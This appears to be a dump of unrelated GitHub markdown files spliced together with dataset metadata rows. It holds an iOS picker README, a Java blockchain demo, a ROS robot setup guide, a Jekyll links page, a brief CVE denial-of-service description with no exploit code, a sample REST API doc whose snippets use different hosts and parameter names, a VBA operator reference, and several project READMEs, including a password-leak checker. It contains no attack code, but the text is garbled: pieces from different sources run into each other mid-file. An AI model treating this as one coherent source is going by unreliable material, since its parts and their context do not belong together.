CDZPickerComponentObject *guangdong = [[CDZPickerComponentObject alloc]initWithText:@"广东省"];
guangdong.subArray = [NSMutableArray arrayWithObjects:guangzhou,chaozhou, nil];
CDZPickerComponentObject *pixian = [[CDZPickerComponentObject alloc]initWithText:@"郫县"];
CDZPickerComponentObject *chengdu = [[CDZPickerComponentObject alloc]initWithText:@"成都市"];
chengdu.subArray = [NSMutableArray arrayWithObjects:pixian, nil];
CDZPickerComponentObject *leshan = [[CDZPickerComponentObject alloc]initWithText:@"乐山市"];
CDZPickerComponentObject *sichuan = [[CDZPickerComponentObject alloc]initWithText:@"四川省"];
sichuan.subArray = [NSMutableArray arrayWithObjects:chengdu,leshan, nil];
```
```objective-c
[CDZPicker showLinkagePickerInView:self.view withBuilder:nil components:@[guangdong,sichuan] confirm:^(NSArray<NSString *> * _Nonnull strings, NSArray<NSNumber *> * _Nonnull indexs) {
self.label.text = [strings componentsJoinedByString:@","];
}cancel:^{
//your code
}];
```
## Articles
[Wrapping a custom UIPickerView in iOS (Button edition)](http://www.jianshu.com/p/bf7f304ee308)
[Implementing a compact multi-column linked PickerView in iOS](http://www.jianshu.com/p/ab35c440a352)
## Requirements
iOS 8.0 and above
## TODO
- Add configuration options for labels.
## Contact
- Open a issue
- QQ:757765420
- Email:nemocdz@gmail.com
- Weibo:[@Nemocdz](http://weibo.com/nemocdz)
## License
CDZPicker is available under the MIT license. See the LICENSE file for more info.
# java-basic-blockchain
Proof-of-concept block chain implementation in Java
This project is a Java POC implementation of a [Python basic block chain implementation](https://hackernoon.com/learn-blockchains-by-building-one-117428612f46)
# Usage
Build the block chain jar file using make.ps1 (on Windows) or make.sh (on Unix); this will create the jar file
[basic-blockchain.jar](basic-blockchain.jar)
Now run the following command:
```bash
java -jar basic-blockchain.jar
```
This will start the block chain node at http://localhost:3088
Now to run a second basic block chain node:
```bash
java -jar basic-blockchain.jar http://localhost:3088
```
This will start the second block chain node at http://localhost:3089, using the node at http://localhost:3088 as the
seed node to broadcast its IP address.
The following api is available for the block chain:
* http://localhost:3088/mine: mine by running proof-of-work in the current node
* http://localhost:3088/nodes/resolve: achieve consensus in the block chain network by resolving conflicts
* http://localhost:3088/transactions/new: add a new transaction to the current node
* http://localhost:3088/chain: return the chain stored in the current node
* http://localhost:3088/nodes: return the list of nodes participating in the block chain
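The `/mine` endpoint performs a proof-of-work search like the one in the Python tutorial this project ports. The idea can be sketched in a few lines (illustrative only — this is not the project's Java code, and the real difficulty and hash rule may differ):

```python
import hashlib

def valid_proof(last_proof: int, proof: int, difficulty: int = 4) -> bool:
    """A proof is valid when sha256("<last_proof><proof>") starts with
    `difficulty` zero hex digits."""
    guess = f"{last_proof}{proof}".encode()
    return hashlib.sha256(guess).hexdigest().startswith("0" * difficulty)

def proof_of_work(last_proof: int, difficulty: int = 4) -> int:
    """Brute-force the smallest proof that satisfies valid_proof."""
    proof = 0
    while not valid_proof(last_proof, proof, difficulty):
        proof += 1
    return proof
```

Lower difficulty values make the search fast; each extra zero digit multiplies the expected work by 16.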
# S4H2021-QuadrUS
### Quadruped Robot | UdeS-GRO
[](http://makeapullrequest.com) [](https://opensource.com/resources/what-open-source) [](https://opensource.org/licenses/MIT)
## Original contributors
 <br>
**From left to right:** Anthony Breton; Jonathan Oreste Maruca; Diego-Alonso Leblanc-Romero; Charles Vuong; Mathias Bourgault; Olivier Fournier
## Final Product

## Table of contents
* [Development environment](#development-environment)
* [Needed installation](#ros-installation-development-environment)
* [To set up this ROS project](#to-set-up-this-ros-project)
* [Using this repository](#using-this-repository)
* [Creating and launching the GUI](#creating-and-launching-the-gui)
* [Launching 2D and 3D simulations without GUI](#launching-2d-and-3d-simulations-without-gui)
* [Robot environment](#robot-environment)
## Development environment
### System requirements
- Ubuntu 20.04 LTS
### Dependencies
- ROS Noetic
- Gazebo
- Pybullet
- Gym
- Scipy
- Numpy
- ROS Joy
- ROS Control
### ROS installation (Development environment)
- ROS Noetic Ninjemys: [Installation documentation](http://wiki.ros.org/noetic/Installation/Ubuntu)
- Gazebo/Rviz : Choose Desktop-Full Install option when installing ROS
### Dependencies installation (packages and second environment)
- Install Terminator
```
sudo apt-get update
```
```
sudo apt-get install terminator
```
- Install all dependencies for Kinematics
```
sudo apt install python3-pip
```
```
sudo apt install python-is-python3
```
```
sudo apt install ros-noetic-joy
```
```
sudo apt install ros-noetic-rosserial
```
```
sudo apt install ros-noetic-rosserial-python
```
```
sudo apt install ros-noetic-rosserial-arduino
```
```
pip3 install pybullet
```
```
pip3 install gym
```
- Install all dependencies for control
```
sudo apt install ros-noetic-ros-control
```
```
sudo apt install ros-noetic-robot-state-publisher
```
```
sudo apt install ros-noetic-control-msgs
```
### To set up this ROS project
- Create and initialize a catkin workspace
```
mkdir -p ~/quadrus_ws/src
```
```
cd ~/quadrus_ws/src
```
```
catkin_init_workspace
```
- Clone the git repository into the src folder
```
git clone --recurse-submodules https://github.com/olivierfournier2/S4H2021-QuadrUS.git
```
- Build the ROS workspace
```
cd ~/quadrus_ws
```
```
catkin_make
```
```
. ~/quadrus_ws/devel/setup.bash
```
At this point, the ROS environment should be set up and ready to work with.
## Using this repository
### Creating and launching the GUI
- Start by launching a terminal
- Access the GUI sub-folder:
```
cd ~/quadrus_ws/src/S4H2021-QuadrUS/PyQt5
```
- Make the script executable:
```
chmod +x quadrus.py
```
- In this folder launch the GUI with:
```
./quadrus.py
```
### Launching 2D and 3D simulations without GUI
- Start by launching terminator and splitting into two terminals (T1 and T2)
- Launch roscore, the main ros node in T1:
```
roscore
```
- To view the robot model in Rviz, execute the following command in T2:
```
roslaunch qd_master qd_master.launch mode:=sim sim_mode:=kin
```
- To start the dynamic simulation in Gazebo, execute the following command in T2:
```
roslaunch qd_master qd_master.launch mode:=sim sim_mode:=dyn
```
## Robot environment
### System Requirements
- RaspberryPi 4
- Ubuntu 20.04.2 LTS, 64 bit
### ROS installation
- ROS Noetic Ninjemys: [Installation documentation](http://wiki.ros.org/noetic/Installation/Ubuntu)
### Network setup
- Set up the Raspberry Pi as an access point: [Procedure](https://gist.github.com/ExtremeGTX/ea1d1c12dde8261b263ab2fead983dc8)
- To allow SSH over a wired connection, you need to set up a static IP address for both devices: [Procedure](https://linuxize.com/post/how-to-configure-static-ip-address-on-ubuntu-20-04/)
# interactiveImageSegmentation
An interactive MATLAB app for image segmentation.
---
layout: page
title: Links
---
- [yatiko.c1.biz](http://www.yatiko.c1.biz/) : My old website
### Dhamma in English
- [youtube.com](https://www.youtube.com/channel/UCCRXOn6Tsrgm9gJR4z3qLZA) : Ajahn Sona's Chanel
- [youtube.com](https://www.youtube.com/c/AjahnPunnadhammo) : Ajahn Punnadhammo's Chanel
- [youtube.com](https://www.youtube.com/channel/UCsgmmAelfZ2kfXZ08xlHpDw) : Amaravati Monastery Chanel
- [dhammatalks.org](http://www.dhammatalks.org) : Ajahn Thanissaro's Website
- [forestsangha.org](http://www.forestsangha.org) : Ajahn Chah lineage
- [suttacentral.org](http://www.suttacentral.org) : Sutta translations
- [paliaudio.com](http://www.paliaudio.com) : Sutta audio recordings
- [dhamma.org](http://www.dhamma.org) : Vipassana tradition
- [dhammasukha.org](http://www.dhammasukha.org) : Bhante Vimalaramsi's Webiste
- [pathpress.org](https://pathpress.org/) : Path Press Publication
- [fourthmessenger.org](https://www.fourthmessenger.org/) : The Fourth Messenger
### Dhamma en français
- [sanghadelaforet.org](http://www.sanghadelaforet.org) : Ajahn Chah lineage
- [buddha-vacana.org](http://www.buddha-vacana.org/fr/) : Sutta translations
- [audiosutta.com](http://www.audiosutta.com) : Sutta audio recordings
- [dhammadelaforet.org](http://www.dhammadelaforet.org) : Forest Dhamma
- [refugebouddhique.com](http://www.refugebouddhique.com/) : The refuge
- [dhammadana.org](http://www.dhammadana.org) : Original Buddhism
- [buddha-sasana.org](http://buddha-sasana.org/) : Original Buddhism
### Github & Jekyll
This site is built on GitHub using a fork of the [hitchens](https://github.com/patdryburgh/hitchens/) repository.
- [GitHub Repo](https://github.com/fractalcitta/fractalcitta.github.io) : For this website
- [stephaniehicks.com](http://www.stephaniehicks.com/githubPages_tutorial/pages/githubpages-jekyll.html) : Git and Jekyll tutorial
- [kbroman.org](https://kbroman.org/github_tutorial/pages/init.html) : Another Git tutorial
- [jekyllcodex.org](https://jekyllcodex.org/) : Doc with addons
- [gettalong.org](https://kramdown.gettalong.org/quickref.html) : Kramdown Markup
The background images for this website are created using the [Clifford Attractor](https://observablehq.com/@mbostock/clifford-attractor-iii?collection=@observablehq/webgl).
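For reference, the attractor is just a two-equation iteration. A rough JavaScript sketch (the parameter values below are arbitrary examples, not necessarily the ones used for these backgrounds):

```javascript
// Clifford attractor: x' = sin(a*y) + c*cos(a*x), y' = sin(b*x) + d*cos(b*y)
function cliffordPoints(a, b, c, d, n) {
  const pts = [];
  let x = 0;
  let y = 0;
  for (let i = 0; i < n; i++) {
    const nx = Math.sin(a * y) + c * Math.cos(a * x);
    const ny = Math.sin(b * x) + d * Math.cos(b * y);
    x = nx;
    y = ny;
    pts.push([x, y]);
  }
  return pts;
}

// One classic-looking parameter set; plot the points to see the attractor shape.
const pts = cliffordPoints(-1.4, 1.6, 1.0, 0.7, 10000);
console.log(pts.length); // 10000
```

Feeding these points to D3 or a canvas scatter plot reproduces the familiar swirl.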
Some useful Git commands:
~~~
git pull origin
git clone <url>
git add .
git commit
git remote -v
git remote add origin <url>
git push origin master
~~~
~~~
bundle install
bundle exec jekyll serve
~~~
### Coding
- [aravindiyer.com](https://www.aravindiyer.com/posts/equal-height-image-gallery) : Flex layouts
- [jakearchibald.github.io](https://jakearchibald.github.io/svgomg/) : Minifying SVGs
- [overleaf.com](https://fr.overleaf.com/) : Create LaTeX documents online
- [observablehq.com](https://observablehq.com/) : Code JS and D3 online
- [itools.com](http://itools.com/tool/google-translate-web-page-translator) : Translate a website
- [usefulcharts.com](https://usefulcharts.com/)
| 40.189189 | 172 | 0.747478 | kor_Hang | 0.238158 |
edfb5695fae5fe23df526e3ff71e438eb636e1e1 | 747 | md | Markdown | 2008/CVE-2008-1279.md | sei-vsarvepalli/cve | fbd9def72dd8f1b479c71594bfd55ddb1c3be051 | [
"MIT"
] | 4 | 2022-03-01T12:31:42.000Z | 2022-03-29T02:35:57.000Z | 2008/CVE-2008-1279.md | sei-vsarvepalli/cve | fbd9def72dd8f1b479c71594bfd55ddb1c3be051 | [
"MIT"
] | null | null | null | 2008/CVE-2008-1279.md | sei-vsarvepalli/cve | fbd9def72dd8f1b479c71594bfd55ddb1c3be051 | [
"MIT"
] | 1 | 2022-03-29T02:35:58.000Z | 2022-03-29T02:35:58.000Z | ### [CVE-2008-1279](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1279)



### Description
Acronis True Image Group Server 1.5.19.191 and earlier, included in Acronis True Image Enterprise Server 9.5.0.8072 and the other True Image packages, allows remote attackers to cause a denial of service (crash) via a packet with an invalid length field, which causes an out-of-bounds read.
### POC
#### Reference
- http://aluigi.altervista.org/adv/acrogroup-adv.txt
#### Github
No GitHub POC found.
| 41.5 | 290 | 0.748327 | eng_Latn | 0.536361 |
edfbfb9a44d2d7d7e8da11418f370133b1ade146 | 1,578 | md | Markdown | _api/advocates_get.md | YitziG/yitzig.github.io | 836a6fc30f413ee5e63de3b4ec1ab94e3b504aaf | [
"MIT"
] | null | null | null | _api/advocates_get.md | YitziG/yitzig.github.io | 836a6fc30f413ee5e63de3b4ec1ab94e3b504aaf | [
"MIT"
] | null | null | null | _api/advocates_get.md | YitziG/yitzig.github.io | 836a6fc30f413ee5e63de3b4ec1ab94e3b504aaf | [
"MIT"
] | null | null | null | ---
title: /advocates/:id
position: 1.1
type: get
description: Get Advocate
parameters:
- name:
content:
content_markdown: |-
Returns a specific advocate from your collection
left_code_blocks:
- code_block: |-
$.get("http://api.myapp.com/advocates/yitzi", {
token: "YOUR_APP_KEY",
}, function(data) {
alert(data);
});
title: jQuery
language: javascript
- code_block: |-
      r = requests.get("http://api.devrel.com/advocates/yitzi", params={"token": "YOUR_APP_KEY"})
      print(r.text)
title: Python
language: python
- code_block: |-
var request = require("request");
request("http://api.devrel.com/advocates/yitzi?token=YOUR_APP_KEY", function (error, response, body) {
if (!error && response.statusCode == 200) {
console.log(body);
}
      });
title: Node.js
language: javascript
- code_block: |-
curl http://sampleapi.devrel.com/advocates/yitzi?key=YOUR_APP_KEY
title: Curl
language: bash
right_code_blocks:
- code_block: |2-
{
"user": "yitzi",
"degree": "BSc Computer Science",
      "college": "Jerusalem College of Technology",
"email": "yitzi@startbetshemesh.com",
"linkedin": "yitzi.dev/li",
"employer" : "Sifra",
"position" : "Developer Advocate",
"resume" : "yitzi.dev/resume",
"note": "Grab if available!"
}
title: Response
language: json
- code_block: |2-
{
"error": true,
"message": "Advocate doesn't exist"
}
title: Error
language: json
--- | 26.745763 | 108 | 0.598226 | eng_Latn | 0.356684 |
edfc30d0f9ef61d765a262105fdfe0319996d021 | 371 | md | Markdown | docs/endpoints/entry.md | TypedRest/typedrest.net | eb2bc76afa0a8f30631027d60647ae2d1e265a98 | [
"MIT"
] | null | null | null | docs/endpoints/entry.md | TypedRest/typedrest.net | eb2bc76afa0a8f30631027d60647ae2d1e265a98 | [
"MIT"
] | 2 | 2020-05-07T22:47:19.000Z | 2020-08-10T11:31:56.000Z | docs/endpoints/entry.md | TypedRest/docs | eb2bc76afa0a8f30631027d60647ae2d1e265a98 | [
"MIT"
] | null | null | null | # Entry endpoint
Represents the top-level URI of an API, used to address the API's various resources.
The constructor of the entry endpoint requires you to specify the API's root URL. It also provides optional parameters to override the default HTTP client, JSON serializer, [error handler](../error-handling/index.md) and [link handler](../link-handling/index.md).
| 61.833333 | 262 | 0.781671 | eng_Latn | 0.975292 |
edfc6eb777401c34cf63cb3f5ede93e0c827b19e | 1,247 | md | Markdown | README.md | jermsam/sample-s | 0717d17b1e69534b231cb20f6291fd14cb6ffc2b | [
"MIT"
] | 1 | 2020-03-11T18:41:08.000Z | 2020-03-11T18:41:08.000Z | README.md | jermsam/sample-s | 0717d17b1e69534b231cb20f6291fd14cb6ffc2b | [
"MIT"
] | 3 | 2020-07-17T11:47:06.000Z | 2021-09-01T13:17:21.000Z | README.md | jermsam/sample-s | 0717d17b1e69534b231cb20f6291fd14cb6ffc2b | [
"MIT"
] | null | null | null | # sample-s
> A REST/Socket.IO API for a sample social media app
## About
This project uses [Feathers](http://feathersjs.com), an open source web framework for building modern real-time applications.
It stores user data (credentials, posts, comments and replies) in a Postgres database, and is used by the [sample-u](https://github.com/jermsam/sample-u) frontend web app.
The main 3rd party libraries are:
1. [s3-blob-store](https://github.com/jb55/s3-blob-store) for AWS S3 media storage
2. [sequelize](https://github.com/sequelize/sequelize) for relational database mapping with Postgres
## To Run it
Getting up and running is as easy as 1, 2, 3, 4.
1. Clone the repository.
2. Install your dependencies
```
cd path/to/sample-s; yarn
```
3. Set up a postgres database and aws-s3 store bucket and then write a .env file that defines the following constants:
```
DB_URL = # the database url for your postgres database
SECRET = # any random string used as your JWT authentication secret
AWSBucket = # your aws-s3 bucket name
AWSAccessKeyId = # your aws-s3 access key id
AWSSecretKey = # your aws-s3 secret key
```
4. Start your app
```
yarn start
```
## Testing
Simply run `yarn test` and all your tests in the `test/` directory will be run.
| 28.340909 | 155 | 0.72494 | eng_Latn | 0.957923 |
edfca36d3edbd37657fb5378f9e025b09af2ef5a | 6,272 | md | Markdown | Language/Reference/User-Interface-Help/comparison-operators.md | skucab/VBA-Docs | 2912fe0343ddeef19007524ac662d3fcb8c0df09 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | Language/Reference/User-Interface-Help/comparison-operators.md | skucab/VBA-Docs | 2912fe0343ddeef19007524ac662d3fcb8c0df09 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-09-28T07:52:15.000Z | 2021-09-28T07:52:15.000Z | Language/Reference/User-Interface-Help/comparison-operators.md | skucab/VBA-Docs | 2912fe0343ddeef19007524ac662d3fcb8c0df09 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-09-28T07:45:29.000Z | 2021-09-28T07:45:29.000Z | ---
title: Comparison operators
keywords: vblr6.chm1008875
f1_keywords:
- vblr6.chm1008875
ms.prod: office
ms.assetid: 9c254e88-5641-ea7d-b99a-cb614c3095a7
ms.date: 11/19/2018
localization_priority: Priority
---
# Comparison operators
Used to compare [expressions](../../Glossary/vbe-glossary.md#expression).
## Syntax
_result_ = _expression1_ _comparisonoperator_ _expression2_ <br/>
_result_ = _object1_ **Is** _object2_ <br/>
_result_ = _string_ **Like** _pattern_
[Comparison operators](../../Glossary/vbe-glossary.md#comparison-operator) have these parts:
|Part|Description|
|:-----|:-----|
| _result_|Required; any numeric [variable](../../Glossary/vbe-glossary.md#variable).|
| _expression_|Required; any expression.|
| _comparisonoperator_|Required; any comparison operator.|
| _object_|Required; any object name.|
| _string_|Required; any [string expression](../../Glossary/vbe-glossary.md#string-expression).|
| _pattern_|Required; any string expression or range of characters.|
## Remarks
The following table contains a list of the comparison operators and the conditions that determine whether _result_ is **True**, **False**, or [Null](../../Glossary/vbe-glossary.md#null).
|Operator|True if|False if|Null if|
|:-----|:-----|:-----|:-----|
|`<` (Less than)| _expression1_ < _expression2_| _expression1_ >= _expression2_| _expression1_ or _expression2_ = **Null**|
|`<=` (Less than or equal to)| _expression1_ <= _expression2_| _expression1_ > _expression2_| _expression1_ or _expression2_ = **Null**|
|`>` (Greater than)| _expression1_ > _expression2_| _expression1_ <= _expression2_| _expression1_ or _expression2_ = **Null**|
|`>=` (Greater than or equal to)| _expression1_ >= _expression2_| _expression1_ < _expression2_| _expression1_ or _expression2_ = **Null**|
|`=` (Equal to)| _expression1_ = _expression2_| _expression1_ <> _expression2_| _expression1_ or _expression2_ = **Null**|
|`<>` (Not equal to)| _expression1_ <> _expression2_| _expression1_ = _expression2_| _expression1_ or _expression2_ = **Null**|
> [!NOTE]
> The **Is** and **Like** operators have specific comparison functionality that differs from the operators in the table.
When comparing two expressions, you may not be able to easily determine whether the expressions are being compared as numbers or as strings. The following table shows how the expressions are compared or the result when either expression is not a [Variant](../../Glossary/vbe-glossary.md#variant-data-type).
|If|Then|
|:-----|:-----|
|Both expressions are [numeric data types](../../Glossary/vbe-glossary.md#numeric-data-type) ([Byte](../../Glossary/vbe-glossary.md#byte-data-type), [Boolean](../../Glossary/vbe-glossary.md#boolean-data-type), [Integer](../../Glossary/vbe-glossary.md#integer-data-type), [Long](../../Glossary/vbe-glossary.md#long-data-type), [Single](../../Glossary/vbe-glossary.md#single-data-type), [Double](../../Glossary/vbe-glossary.md#double-data-type), [Date](../../Glossary/vbe-glossary.md#date-data-type), [Currency](../../Glossary/vbe-glossary.md#currency-data-type), or [Decimal](../../Glossary/vbe-glossary.md#decimal-data-type))|Perform a numeric comparison.|
|Both expressions are [String](../../Glossary/vbe-glossary.md#string-data-type)|Perform a [string comparison](../../Glossary/vbe-glossary.md#string-comparison).|
|One expression is a numeric data type and the other is a **Variant** that is, or can be, a number|Perform a numeric comparison.|
|One expression is a numeric data type and the other is a string **Variant** that can't be converted to a number|A `Type Mismatch` error occurs.|
|One expression is a **String** and the other is any **Variant** except a **Null**|Perform a string comparison.|
|One expression is [Empty](../../Glossary/vbe-glossary.md#empty) and the other is a numeric data type|Perform a numeric comparison, using 0 as the **Empty** expression.|
|One expression is **Empty** and the other is a **String**|Perform a string comparison, using a zero-length string ("") as the **Empty** expression.|
<br/>
If _expression1_ and _expression2_ are both **Variant** expressions, their underlying type determines how they are compared. The following table shows how the expressions are compared or the result from the comparison, depending on the underlying type of the **Variant**.
|If|Then|
|:-----|:-----|
|Both **Variant** expressions are numeric|Perform a numeric comparison.|
|Both **Variant** expressions are strings|Perform a string comparison.|
|One **Variant** expression is numeric and the other is a string|The numeric expression is less than the string expression.|
|One **Variant** expression is **Empty** and the other is numeric|Perform a numeric comparison, using 0 as the **Empty** expression.|
|One **Variant** expression is **Empty** and the other is a string|Perform a string comparison, using a zero-length string ("") as the **Empty** expression.|
|Both **Variant** expressions are **Empty**|The expressions are equal.|
When a **Single** is compared to a **Double**, the **Double** is rounded to the precision of the **Single**.
If a **Currency** is compared with a **Single** or **Double**, the **Single** or **Double** is converted to a **Currency**.
Similarly, when a **Decimal** is compared with a **Single** or **Double**, the **Single** or **Double** is converted to a **Decimal**. For **Currency**, any fractional value less than .0001 may be lost; for **Decimal**, any fractional value less than 1E-28 may be lost, or an overflow error can occur. Such fractional value loss may cause two values to compare as equal when they are not.
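The Single-to-Double rounding rule above can be observed directly. A minimal sketch (variable names are illustrative; per the rule, the Double operand is rounded to Single precision before the comparison, so a small fractional difference can disappear):

```vb
Dim sng As Single, dbl As Double
sng = 1.12345678
dbl = 1.12345678
' dbl stores more precision than sng, but in a Single-to-Double
' comparison the Double is rounded to Single precision first.
Debug.Print (sng = dbl)
```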
## Example
This example shows various uses of comparison operators, which you use to compare expressions.
```vb
Dim MyResult, Var1, Var2
MyResult = (45 < 35) ' Returns False.
MyResult = (45 = 45) ' Returns True.
MyResult = (4 <> 3) ' Returns True.
MyResult = ("5" > "4") ' Returns True.
Var1 = "5": Var2 = 4 ' Initialize variables.
MyResult = (Var1 > Var2) ' Returns True.
Var1 = 5: Var2 = Empty
MyResult = (Var1 > Var2) ' Returns True.
Var1 = 0: Var2 = Empty
MyResult = (Var1 = Var2) ' Returns True.
```
## See also
- [Operator summary](operator-summary.md)
[!include[Support and feedback](~/includes/feedback-boilerplate.md)] | 58.074074 | 656 | 0.720504 | eng_Latn | 0.958172 |
edfccf87c75bc11a99b0ecca874fb8f3075049d1 | 428 | md | Markdown | content/core/2.1.0/umbraco-v9/reference/vendr-core/vendr-core-discounts-rules/ihaschilddiscountrules.md | JamieTownsend84/vendr-documentation | a8295778c4f3a55f976d77ca3f9aa0087572568e | [
"MIT"
] | 6 | 2020-05-27T19:01:56.000Z | 2021-06-11T09:43:59.000Z | content/core/2.1.0/umbraco-v9/reference/vendr-core/vendr-core-discounts-rules/ihaschilddiscountrules.md | JamieTownsend84/vendr-documentation | a8295778c4f3a55f976d77ca3f9aa0087572568e | [
"MIT"
] | 41 | 2020-03-31T11:16:35.000Z | 2022-03-11T10:18:41.000Z | content/core/2.1.0/umbraco-v9/reference/vendr-core/vendr-core-discounts-rules/ihaschilddiscountrules.md | JamieTownsend84/vendr-documentation | a8295778c4f3a55f976d77ca3f9aa0087572568e | [
"MIT"
] | 25 | 2020-03-02T17:26:16.000Z | 2022-02-28T10:47:54.000Z | ---
title: IHasChildDiscountRules
description: API reference for IHasChildDiscountRules in Vendr, the eCommerce solution for Umbraco
---
## IHasChildDiscountRules
```csharp
public interface IHasChildDiscountRules
```
**Namespace**
* [Vendr.Core.Discounts.Rules](../)
### Properties
#### Rules
```csharp
public IList<IDiscountRuleProvider> Rules { get; }
```
<!-- DO NOT EDIT: generated by xmldocmd for Vendr.Core.dll -->
| 17.833333 | 98 | 0.731308 | yue_Hant | 0.358542 |
edfd05b4866744dd189ad342065d3f26353b156b | 1,599 | md | Markdown | docs/api/Pihrtsoft/Text/RegularExpressions/Linq/Pattern/op_Explicit/README.md | timiil/LinqToRegex | 6213e778681bfc20225b19de7ca3200dc9a4f12f | [
"Apache-2.0"
] | 156 | 2015-08-12T17:57:07.000Z | 2022-01-30T03:14:29.000Z | docs/api/Pihrtsoft/Text/RegularExpressions/Linq/Pattern/op_Explicit/README.md | timiil/LinqToRegex | 6213e778681bfc20225b19de7ca3200dc9a4f12f | [
"Apache-2.0"
] | 3 | 2016-04-26T09:08:02.000Z | 2017-11-02T16:10:42.000Z | docs/api/Pihrtsoft/Text/RegularExpressions/Linq/Pattern/op_Explicit/README.md | timiil/LinqToRegex | 6213e778681bfc20225b19de7ca3200dc9a4f12f | [
"Apache-2.0"
] | 18 | 2015-08-13T19:34:34.000Z | 2021-12-04T15:38:35.000Z | # Pattern\.Explicit Operator
[Home](../../../../../../README.md)
**Containing Type**: [Pattern](../README.md)
**Assembly**: Pihrtsoft\.Text\.RegularExpressions\.Linq\.dll
## Overloads
| Operator | Summary |
| -------- | ------- |
| [Explicit(Char to Pattern)](#Pihrtsoft_Text_RegularExpressions_Linq_Pattern_op_Explicit_System_Char__Pihrtsoft_Text_RegularExpressions_Linq_Pattern) | Converts specified character to a pattern\. |
| [Explicit(String to Pattern)](#Pihrtsoft_Text_RegularExpressions_Linq_Pattern_op_Explicit_System_String__Pihrtsoft_Text_RegularExpressions_Linq_Pattern) | Converts specified text to a pattern\. |
## Explicit\(Char to Pattern\) <a id="Pihrtsoft_Text_RegularExpressions_Linq_Pattern_op_Explicit_System_Char__Pihrtsoft_Text_RegularExpressions_Linq_Pattern"></a>
\
Converts specified character to a pattern\.
```csharp
public static explicit operator Pihrtsoft.Text.RegularExpressions.Linq.Pattern(char value)
```
### Parameters
**value**   [Char](https://docs.microsoft.com/en-us/dotnet/api/system.char)
The Unicode character to convert\.
### Returns
[Pattern](../README.md)
## Explicit\(String to Pattern\) <a id="Pihrtsoft_Text_RegularExpressions_Linq_Pattern_op_Explicit_System_String__Pihrtsoft_Text_RegularExpressions_Linq_Pattern"></a>
\
Converts specified text to a pattern\.
```csharp
public static explicit operator Pihrtsoft.Text.RegularExpressions.Linq.Pattern(string text)
```
### Parameters
**text**   [String](https://docs.microsoft.com/en-us/dotnet/api/system.string)
A text to convert\.
### Returns
[Pattern](../README.md)
| 29.611111 | 198 | 0.771732 | yue_Hant | 0.416736 |
edfde757cb61bc5bcf3e42722135bd06d80336df | 284 | md | Markdown | docs/readme.md | xXluki98Xx/youtube-dl-server | 65b1e5a1e98000eb09440443b3a17f261ca3e138 | [
"MIT"
] | 1 | 2020-07-28T15:58:02.000Z | 2020-07-28T15:58:02.000Z | docs/readme.md | xXluki98Xx/youtube-dl-server | 65b1e5a1e98000eb09440443b3a17f261ca3e138 | [
"MIT"
] | null | null | null | docs/readme.md | xXluki98Xx/youtube-dl-server | 65b1e5a1e98000eb09440443b3a17f261ca3e138 | [
"MIT"
] | null | null | null | please install the python moduls and linux packages using
```
pip3 install -r requirements.txt --upgrade
cat requirements-apt.txt | xargs sudo apt install -y
```
Then, if you want to upload something to GitHub, tell Git to ignore every change to the env file:
```
git update-index --assume-unchanged
```
| 31.555556 | 87 | 0.785211 | eng_Latn | 0.974519 |
edfeccb057b3131be62f047317a22d72bccf231c | 1,291 | md | Markdown | NOTES.md | jan25/skripts | aae0197acdf1c073a5761e14298c02d6c299024a | [
"MIT"
] | null | null | null | NOTES.md | jan25/skripts | aae0197acdf1c073a5761e14298c02d6c299024a | [
"MIT"
] | 1 | 2021-06-05T08:36:27.000Z | 2021-06-05T08:36:27.000Z | NOTES.md | jan25/skripts | aae0197acdf1c073a5761e14298c02d6c299024a | [
"MIT"
] | 1 | 2020-07-09T17:26:32.000Z | 2020-07-09T17:26:32.000Z | ## Features
- Editor to write JS code
- Execute button to run code
- Save button to save new changes in code
- Output panel to display output or errors
- Generate Unique URL for a script using backend store
- File based datastore
- Persistent/distributed database (nice to have)
- Add dependencies(npm/node) (nice to have)
## Design
- Vue.js frontend with a single page
- Logo
- Center aligned editor
- Execute and Save button below editor
- Output panel below editor, editor buttons
- Node backend to serve frontend static files, save and execute endpoints
- `GET /[<UID>]` endpoint to serve home page
- `POST /exec` endpoint to send code, execute on server and return results(or errors)
- `POST /save` endpoint to save code
- File based backend store to create unique URL per script
- Redirect to `/<UID>` on `/exec` and `/save` for a new script
- 6 char randomly generated alpha-numeric IDs
- Caveat: Coupled to a single server instance
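A sketch of the 6-char ID generation described above (the helper name and alphabet are assumptions, not the project's actual code):

```javascript
// Hypothetical helper: 6-character, lowercase alphanumeric script ID.
const ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789';

function generateUid(length = 6) {
  let id = '';
  for (let i = 0; i < length; i++) {
    id += ALPHABET[Math.floor(Math.random() * ALPHABET.length)];
  }
  return id;
}

console.log(generateUid()); // e.g. "xdh452"
```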
### ABANDONED
- Node runtime on server - will use node backend calls
- Single/shared runtime per server instance
- `/node-runtime` has the node project including `package.json` and `node_modules`
- `/scripts` folder inside node project to keep track of saved scripts
- E.g. `/node-runtime/scripts/xdh452.js`
| 35.861111 | 87 | 0.730442 | eng_Latn | 0.967113 |
edff8f8f1d72c3f0ecdf1a06b5e0de7bc457cb23 | 3,589 | md | Markdown | data/readme_files/christophetd.firepwned.md | DLR-SC/repository-synergy | 115e48c37e659b144b2c3b89695483fd1d6dc788 | [
"MIT"
] | 5 | 2021-05-09T12:51:32.000Z | 2021-11-04T11:02:54.000Z | data/readme_files/christophetd.firepwned.md | DLR-SC/repository-synergy | 115e48c37e659b144b2c3b89695483fd1d6dc788 | [
"MIT"
] | null | null | null | data/readme_files/christophetd.firepwned.md | DLR-SC/repository-synergy | 115e48c37e659b144b2c3b89695483fd1d6dc788 | [
"MIT"
] | 3 | 2021-05-12T12:14:05.000Z | 2021-10-06T05:19:54.000Z | # firepwned
[](https://travis-ci.org/christophetd/firepwned)
Firepwned is a tool that checks if your Firefox saved passwords have been involved in a known data leak using the [Have I Been Pwned API](https://haveibeenpwned.com/Passwords).
<p align="center">
<img src="./screenshot.png" />
</p>
Features:
- **Does not send any of your password or password hash to any third-party service, including Have I Been Pwned** (see [How It Works](#how-it-works) below).
- Supports Firefox profiles encrypted with a master password.
- Uses multiple threads for efficiency.
## Installation
```
$ git clone https://github.com/christophetd/firepwned.git
$ cd firepwned
$ pip install -r requirements.txt
```
On Debian / Ubuntu you'll need the package `libnss3`, which you should already have if you have Firefox installed.
On Mac OS X, you'll need to install NSS: `brew install nss` or `port install nss`.
## Usage
```
$ python firepwned.py
```
